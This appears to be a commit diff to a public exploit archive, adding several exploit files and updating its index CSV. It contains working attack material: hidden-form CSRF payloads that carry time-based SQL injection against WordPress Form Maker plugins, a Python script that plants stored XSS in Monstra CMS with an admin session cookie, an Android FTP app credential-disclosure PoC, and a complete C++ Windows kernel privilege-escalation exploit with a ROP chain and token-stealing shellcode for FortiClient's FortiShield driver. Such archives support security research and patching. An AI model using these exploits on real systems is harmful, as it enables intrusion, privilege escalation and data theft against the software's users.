DB: 2018-06-08

5 changes to exploits/shellcodes macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation Ftp Server 1.32 - Credential Disclosure WordPress Form Maker Plugin 1.12.24 - SQL Injection WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection Monstra CMS < 3.0.4 - Cross-Site Scripting Automation
2018-06-08 05:01:44 +00:00 · 2018-06-08 05:01:44 +00:00 · 4af1687693
commit 4af1687693
parent 0909e63d9e
6 changed files with 416 additions and 4 deletions
--- a/exploits/android/local/44852.txt
+++ b/exploits/android/local/44852.txt
@ -0,0 +1,33 @@
+# Exploit Title: Ftp Server 1.32 - Credential Disclosure
+# Date: 2018-05-29
+# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver
+# Version: 1.32 Android App
+# Vendor: The Olive Tree
+# Exploit Author: ManhNho
+# CVE: N/A
+# Category: Mobile Apps
+# Tested on: Android 4.4
+
+# Description
+# Ftp Server 1.32 Insecure Data Storage, the result of storing confidential
+# information insecurely on the system i.e. poor encryption, plain text, 
+# access control issues etc. Attacker can find out username/password of valid user via
+# /data/data/com.theolivetree.ftpserver/shared_prefs/com.theolivetree.ftpserver_preferences.xml
+
+# PoC
+
+<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
+<map>
+    <string name="prefPort">2221</string>
+    <string name="prefPasivePort">2300-2399</string>
+    <string name="prefUserpass">ManhNho</string>
+    <boolean name="prefEnergySave" value="false" />
+    <boolean name="prefShowHidden" value="false" />
+    <boolean name="prefShowCredentials" value="true" />
+    <string name="prefInterfaces">0</string>
+    <string name="prefHomeDir">1</string>
+    <string name="prefUsername">ManhNho</string>
+    <boolean name="prefReadonly" value="false" />
+    <boolean name="prefAnonymous" value="true" />
+    <boolean name="prefForeground" value="true" />
+</map>
--- a/exploits/php/webapps/44853.txt
+++ b/exploits/php/webapps/44853.txt
@ -0,0 +1,39 @@
+# Title: WordPress Form Maker Plugin 1.12.24 - SQL Injection
+# Date: 2018-06-07
+# Author: Neven Biruski
+# Software: WordPress Form Maker plugin
+# https://wordpress.org/plugins/form-maker/
+# Version: 1.12.24 and below
+# Vendor Status: Vendor contacted, update released
+
+# The easiest way to reproduce the SQL injection vulnerabilities is to
+# open the presented HTML/JavaScript snippet in your browser while being
+# logged in as administrator or another user that is authorized to
+# access the plugin settings page. Users that do not have full
+# administrative privileges could abuse the database access the
+# vulnerabilities provide to either escalate their privileges or obtain
+# and modify database contents they were not supposed to be able to.
+
+# PoC 1
+
+<iframe style="display:none" name="invisible"></iframe>
+<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping&task=db_table_struct"
+target="invisible">
+<input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
+</form>
+<script>
+ document.getElementById("form").submit();
+ sleep(3000);
+</script>
+
+# PoC 2
+
+<iframe style="display:none" name="invisible"></iframe>
+<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=6&send_header=0&action=generete_csv&limitstart=0"
+target="invisible">
+<input type="hidden" name="search_labels" value="2) AND (SELECT * FROM (SELECT(SLEEP(42)))XXX)-- XXX"/>
+</form>
+<script>
+ document.getElementById("form").submit();
+ sleep(3000);
+</script>
--- a/exploits/php/webapps/44854.txt
+++ b/exploits/php/webapps/44854.txt
@ -0,0 +1,39 @@
+# Title: WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
+# Date: 2018-06-07
+# Author: Neven Biruski
+# Software: WordPress Contact Form Maker plugin
+# Software link: https://wordpress.org/plugins/contact-form-maker/
+# Version: 1.12.20 and below
+
+# The easiest way to reproduce the SQL injection vulnerabilities is to
+# open the presented HTML/JavaScript snippet in your browser while being
+# logged in as administrator or another user that is authorized to
+# access the plugin settings page. Users that do not have full
+# administrative privileges could abuse the database access the
+# vulnerabilities provide to either escalate their privileges or obtain
+# and modify database contents they were not supposed to be able to.
+
+
+# PoC 1
+
+<iframe style="display:none" name="invisible"></iframe>
+<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct"
+target="invisible">
+<input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
+</form>
+<script>
+ document.getElementById("form").submit();
+ sleep(3000);
+</script>
+
+# PoC 2
+
+<iframe style="display:none" name="invisible"></iframe>
+<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0"
+target="invisible">
+<input type="hidden" name="search_labels" value="(SELECT * FROM (SELECT(SLEEP(42)))XXX)"/>
+</form>
+<script>
+ document.getElementById("form").submit();
+ sleep(3000);
+</script>
--- a/exploits/php/webapps/44855.py
+++ b/exploits/php/webapps/44855.py
@ -0,0 +1,53 @@
+# Title: Monstra CMS < 3.0.4 - Cross-Site Scripting Automation
+# Date: 2018-06-07
+# Author: DEEPIN2
+# Software: Monstra CMS
+# Version: 3.0.4 and earlier
+
+import requests
+import re
+
+def runXSS(target, cookie, data):
+	exploit = requests.post(target, cookies=cookie, data=data).text
+	if re.search('exploit', exploit):
+		return 'OK'
+	else:
+		return 'ERROR'
+	
+if __name__ == '__main__':
+	print('''  ______     _______     ____   ___  _  ___        _  ___  _ _  ___
+ / ___\ \   / / ____|   |___ \ / _ \/ |( _ )      / |/ _ \/ / |( _ )
+| |    \ \ / /|  _| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ `
+| |___  \ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) |
+ \____|  \_/  |_____|   |_____|\___/|_|\___/      |_|\___/|_|_|\___/
+ 	[*] Author : DEEPIN2(Junseo Lee)
+---------------------------------------------------------------------''')
+	print('[*] Ex) http://www.target.com -> www.target.com')
+	url = input('Target : ')
+	print('[*] Required admin\'s PHPSESSID.')
+	PHPSESSID = input('PHPSESSID : ')
+	pagename = input('Pagename : ')
+	script = input('Script : ')
+	target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
+	cookie = {'PHPSESSID':PHPSESSID}
+	data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
+			'page_title':script,\
+			'page_name':pagename,\
+			'page_meta_title':'',\
+			'page_keywords':'',\
+			'page_description':'',\
+			'pages':0,\
+			'templates':'index',\
+			'status':'published',\
+			'access':'public',\
+			'editor':'',\
+			'page_tags':'',\
+			'add_page_and_exit':'Save+and+Exit',\
+			'page_date':'9999-99-99'}
+
+	result = runXSS(target, cookie, data)
+	print('-' * 69)
+	if result == 'OK':
+		print('[+] LINK : http://' + url + '/' + pagename)
+	else:
+		print('[-] Error')
--- a/exploits/windows_x86/local/41705.cpp
+++ b/exploits/windows_x86/local/41705.cpp
@ -0,0 +1,243 @@
+/*
+Check these out:
+- https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf
+- https://labs.mwrinfosecurity.com/blog/a-tale-of-bitmaps/
+Tested on:
+- Windows 10 Pro x86 1703/1709
+- ntoskrnl.exe: 10.0.16299.309
+- FortiShield.sys: 5.2.3.633
+Compile:
+- i686-w64-mingw32-g++ forticlient_win10_x86.cpp -o forticlient_win10_x86.exe -m32 -lpsapi
+ 
+Thanks to master @ryujin and @ronin for helping out. And thanks to Morten (@Blomster81) for the MiGetPteAddress :D
+and m00 to @g0tmi1k <3
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <Windows.h>
+#include <Psapi.h>
+
+DWORD get_pxe_address_32(DWORD address) {
+
+	DWORD result = address >> 9;
+	result = result | 0xC0000000;
+	result = result & 0xC07FFFF8;
+	return result;
+}
+
+LPVOID GetBaseAddr(char *drvname) {
+
+	LPVOID drivers[1024];
+	DWORD cbNeeded;
+	int nDrivers, i = 0;
+
+	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
+		char szDrivers[1024];
+		nDrivers = cbNeeded / sizeof(drivers[0]);
+		for (i = 0; i < nDrivers; i++) {
+			if (GetDeviceDriverBaseName(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
+				if (strcmp(szDrivers, drvname) == 0) {
+					return drivers[i];
+				}
+			}
+		}
+	}
+	return 0;
+}
+
+int find_gadget(HMODULE lpFileName, unsigned char search_opcode[], int opcode_size) {
+
+    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)lpFileName;
+    if(dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
+        printf("[!] Invalid file.\n");
+        exit(1);
+    }
+
+    //Offset of NT Header is found at 0x3c location in DOS header specified by e_lfanew
+    //Get the Base of NT Header(PE Header)  = dosHeader + RVA address of PE header
+    PIMAGE_NT_HEADERS ntHeader;
+    ntHeader = (PIMAGE_NT_HEADERS)((ULONGLONG)(dosHeader) + (dosHeader->e_lfanew));
+    if(ntHeader->Signature != IMAGE_NT_SIGNATURE){
+        printf("[!] Invalid PE Signature.\n");
+        exit(1);
+    }
+
+    //Info about Optional Header
+    IMAGE_OPTIONAL_HEADER opHeader;
+    opHeader = ntHeader->OptionalHeader;
+
+    unsigned char *ntoskrnl_buffer = (unsigned char *)malloc(opHeader.SizeOfCode);
+    SIZE_T size_read;
+
+    //ULONGLONG ntoskrnl_code_base = (ULONGLONG)lpFileName + opHeader.BaseOfCode;
+    BOOL rpm = ReadProcessMemory(GetCurrentProcess(), lpFileName, ntoskrnl_buffer, opHeader.SizeOfCode, &size_read);
+    if (rpm == 0) {
+        printf("[!] Error while calling ReadProcessMemory: %d\n", GetLastError());
+        exit(1);
+    }
+
+    int j;
+    int z;
+    DWORD gadget_offset = 0;
+
+    for (j = 0; j < opHeader.SizeOfCode; j++) {
+        unsigned char *gadget = (unsigned char *)malloc(opcode_size);
+        memset(gadget, 0x00, opcode_size);
+        for (z = 0; z < opcode_size; z++) {
+            gadget[z] = ntoskrnl_buffer[j - z];
+        }
+
+        int comparison;
+        comparison = memcmp(search_opcode, gadget, opcode_size);
+        if (comparison == 0) {
+            gadget_offset = j - (opcode_size - 1);
+        }
+    }
+
+    if (gadget_offset == 0) {
+        printf("[!] Error while retrieving the gadget, exiting.\n");
+        exit(1);
+    }
+    return gadget_offset;
+}
+
+LPVOID allocate_shellcode(LPVOID nt, DWORD fortishield_callback, DWORD fortishield_restore, DWORD pte_result, HMODULE lpFileName) {
+
+    HANDLE pid;
+    pid = GetCurrentProcess();
+    DWORD shellcode_address = 0x22ffe000;
+    LPVOID allocate_shellcode;
+    allocate_shellcode = VirtualAlloc((LPVOID *)shellcode_address, 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+    if (allocate_shellcode == NULL) {
+        printf("[!] Error while allocating rop_chain: %d\n", GetLastError());
+        exit(1);
+    }
+
+
+    /** Windows 10 1703 ROPS
+    DWORD rop_01 = (DWORD)nt + 0x002fe484;
+    DWORD rop_02 = 0x00000063;
+    DWORD rop_03 = (DWORD)nt + 0x0002bbef;
+    DWORD rop_04 = (DWORD)pte_result - 0x01;
+    DWORD rop_05 = (DWORD)nt + 0x000f8d49;
+    DWORD rop_06 = 0x41414141;
+    DWORD rop_07 = (DWORD)nt + 0x000e8a46;
+    DWORD rop_08 = 0x2300d1b8;
+    **/
+
+    /** Windows 10 1709 ROPS **/
+    DWORD rop_01 = (DWORD)nt + 0x0002a8c8;
+    DWORD rop_02 = 0x00000063;
+    DWORD rop_03 = (DWORD)nt + 0x0003a3a3;
+    DWORD rop_04 = (DWORD)pte_result - 0x01;
+    DWORD rop_05 = (DWORD)nt + 0x0008da19;
+    DWORD rop_06 = 0x41414141;
+    DWORD rop_07 = (DWORD)nt + 0x001333ce;
+    DWORD rop_08 = 0x2300d1b8;
+
+    char token_steal[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
+                         "\x8b\x84\x24\xa0\x00\x00\x00\x31"
+                         "\xc9\x89\x08\x31\xc0\x64\x8b\x80"
+                         "\x24\x01\x00\x00\x8b\x80\x80\x00"
+                         "\x00\x00\x89\xc1\x8b\x80\xb8\x00"
+                         "\x00\x00\x2d\xb8\x00\x00\x00\x83"
+                         "\xb8\xb4\x00\x00\x00\x04\x75\xec"
+                         "\x8b\x90\xfc\x00\x00\x00\x89\x91"
+                         "\xfc\x00\x00\x00\x89\xf8\x83\xe8"
+                         "\x20\x50\x8b\x84\x24\xa8\x00\x00"
+                         "\x00\x5c\x89\x04\x24\x89\xfd\x81"
+                         "\xc5\x04\x04\x00\x00\xc2\x04\x00";
+
+    char *shellcode;
+    DWORD shellcode_size = 0x12000;
+    shellcode = (char *)malloc(shellcode_size);
+    memset(shellcode, 0x41, shellcode_size);
+    memcpy(shellcode + 0x2000, &rop_01, 0x04);
+    memcpy(shellcode + 0xf18f, &rop_02, 0x04);
+    memcpy(shellcode + 0xf193, &rop_03, 0x04);
+    memcpy(shellcode + 0xf197, &rop_04, 0x04);
+    memcpy(shellcode + 0xf19b, &rop_05, 0x04);
+    memcpy(shellcode + 0xf19f, &rop_06, 0x04);
+    memcpy(shellcode + 0xf1a3, &rop_07, 0x04);
+    memcpy(shellcode + 0xf1af, &rop_08, 0x04);
+    memcpy(shellcode + 0xf1b8, &token_steal, sizeof(token_steal));
+    memcpy(shellcode + 0xf253, &fortishield_callback, 0x04);
+    memcpy(shellcode + 0xf257, &fortishield_restore, 0x04);
+
+
+    BOOL WPMresult;
+    SIZE_T written;
+    WPMresult = WriteProcessMemory(pid, (LPVOID)shellcode_address, shellcode, shellcode_size, &written);
+    if (WPMresult == 0)
+    {
+        printf("[!] Error while calling WriteProcessMemory: %d\n", GetLastError());
+        exit(1);
+    }
+    printf("[+] Memory allocated at: %p\n", allocate_shellcode);
+    return allocate_shellcode;
+}
+
+DWORD trigger_callback() {
+
+	printf("[+] Creating dummy file\n");
+	system("echo test > test.txt");
+
+	printf("[+] Calling MoveFileEx()\n");
+	BOOL MFEresult;
+	MFEresult = MoveFileEx((LPCSTR)"test.txt", (LPCSTR)"test2.txt", MOVEFILE_REPLACE_EXISTING);
+	if (MFEresult == 0)
+	{
+		printf("[!] Error while calling MoveFileEx(): %d\n", GetLastError());
+		return 1;
+	}
+	return 0;
+}
+
+int main() {
+
+	HANDLE forti;
+	forti = CreateFile((LPCSTR)"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+	if (forti == INVALID_HANDLE_VALUE) {
+		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
+		return 1;
+	}
+
+    HMODULE ntoskrnl = LoadLibrary((LPCSTR)"C:\\Windows\\System32\\ntoskrnl.exe");
+    if (ntoskrnl == NULL) {
+        printf("[!] Error while loading ntoskrnl: %d\n", GetLastError());
+        exit(1);
+    }
+
+    LPVOID nt = GetBaseAddr((char *)"ntoskrnl.exe");
+	LPVOID fortishield_base = GetBaseAddr((char *)"FortiShield.sys");
+
+	DWORD va_pte = get_pxe_address_32(0x2300d000);
+	DWORD pivot = (DWORD)nt + 0x0009b8eb;
+	DWORD fortishield_callback = (DWORD)fortishield_base + 0xba70;
+	DWORD fortishield_restore = (DWORD)fortishield_base + 0x1e95;
+
+	printf("[+] KERNEL found at: %llx\n", (DWORD)nt);
+	printf("[+] FortiShield.sys found at: %llx\n", (DWORD)fortishield_base);
+	printf("[+] PTE virtual address at: %llx\n", va_pte);
+
+    LPVOID shellcode_allocation;
+    shellcode_allocation = allocate_shellcode(nt, fortishield_callback, fortishield_restore, va_pte, ntoskrnl);
+
+	DWORD IoControlCode = 0x220028;
+	DWORD InputBuffer = pivot;
+	DWORD InputBufferLength = 0x4;
+	DWORD OutputBuffer = 0x0;
+	DWORD OutputBufferLength = 0x0;
+	DWORD lpBytesReturned;
+
+    //DebugBreak();
+
+	BOOL triggerIOCTL;
+	triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
+	trigger_callback();
+
+    system("start cmd.exe");
+
+	return 0;
+}
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5988,8 +5988,8 @@ id,file,description,date,author,type,platform,port
 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux,
 44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php,
-44847,exploits/macos/dos/44847.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
-44848,exploits/multiple/dos/44848.c,"macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
+44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
+44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
 44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
@ -9490,8 +9490,8 @@ id,file,description,date,author,type,platform,port
 41887,exploits/windows/local/41887.txt,"VirusChaser 8.0 - Local Buffer Overflow (SEH)",2017-04-14,0x41Li,local,windows,
 42305,exploits/linux/local/42305.txt,"NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation",2017-07-10,"Paul Taylor",local,linux,
 41886,exploits/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation",2017-04-15,"Nassim Asrir",local,linux,
-41721,exploits/windows_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64,
-41722,exploits/windows_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64,
+41721,exploits/windows_x86-64/local/41721.c,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64,
+41722,exploits/windows_x86-64/local/41722.c,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64,
 41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",local,hardware,
 41754,exploits/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Local Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",local,hardware,
 41760,exploits/linux/local/41760.txt,"Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation",2016-02-22,halfdog,local,linux,
@ -9767,6 +9767,8 @@ id,file,description,date,author,type,platform,port
 44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
 44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
 44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux,
+41705,exploits/windows_x86/local/41705.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation",2017-03-11,sickness,local,windows_x86,
+44852,exploits/android/local/44852.txt,"Ftp Server 1.32 - Credential Disclosure",2018-06-07,ManhNho,local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39513,3 +39515,6 @@ id,file,description,date,author,type,platform,port
 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
 44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
 44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
+44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
+44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,
+44855,exploits/php/webapps/44855.py,"Monstra CMS < 3.0.4 - Cross-Site Scripting Automation",2018-06-07,DEEPIN2,webapps,php,